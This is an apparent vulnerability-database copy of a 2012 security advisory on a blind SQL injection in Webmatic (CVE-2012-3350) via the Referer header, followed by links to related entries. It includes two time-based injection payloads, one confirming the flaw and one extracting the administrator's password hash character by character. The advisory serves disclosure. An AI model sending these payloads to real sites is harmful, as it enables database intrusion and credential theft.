Lucene search
High-Tech BridgeHTB23096HistoryJun 13, 2012 - 12:00 a.m.
Blind SQL Injection in Webmatic
2012-06-1300:00:00
High-Tech Bridge
www.htbridge.com
13
EPSS
0.185
Percentile
96.2%
High-Tech Bridge SA Security Research Lab has discovered vulnerability in Webmatic, which can be exploited to perform Blind SQL Injection attacks.
- Blind SQL Injection in Webmatic: CVE-2012-3350
1.1 Input passed via the “Referer:” field of the HTTP header to index.php is not properly sanitised before being used in SQL query resulting in SQL injection. However the SQL injection is blind and shall be exploited by a time-based technique, or any other, suitable for blind SQL injection exploitation.
The following PoC (Proof of Concept) verifies presence of the vulnerability, if SQL injection exists - web application response time will be longer than with a normal HTTP request:
GET / HTTP/1.1
Referer: 1’, IF((1=1),sleep(100),‘’), ‘’, ‘0’, ‘0’, ‘0’) – 2
In the second PoC application response will be longer if the vulnerability is present and if the first character of administrator’s hash is equal to ‘a’:
GET / HTTP/1.1
Referer: 1’, IF(((SELECT mid(password,1,1) FROM_usersWHERE userID=1)=‘a’),sleep(100),‘’), ‘’, ‘0’, ‘0’, ‘0’) – 2
Successful exploitation of the vulnerability requires that “magic_quotes_gpc” is set to off.
Related
dsquare
dsquare
Webmatic SQL Injection
2012-04-12 00:00:00
prion
prion
Sql injection
2012-07-12 21:55:00
packetstorm
packetstorm
Webmatic 3.1.1 Blind SQL Injection
2012-07-04 00:00:00
cvelist
cvelist
CVE-2012-3350
2012-07-12 21:00:00
seebug
seebug
Webmatic 3.1.1 - Blind SQL Injection
2014-07-01 00:00:00
securityvulns
securityvulns
Blind SQL Injection in Webmatic
2012-07-09 00:00:00
nvd
nvd
CVE-2012-3350
2012-07-12 21:55:07
cve
cve
CVE-2012-3350
2012-07-12 21:55:07
exploitpack
exploitpack
Webmatic 3.1.1 - Blind SQL Injection
2012-07-06 00:00:00
exploitdb
exploitdb
Webmatic 3.1.1 - Blind SQL Injection
2012-07-06 00:00:00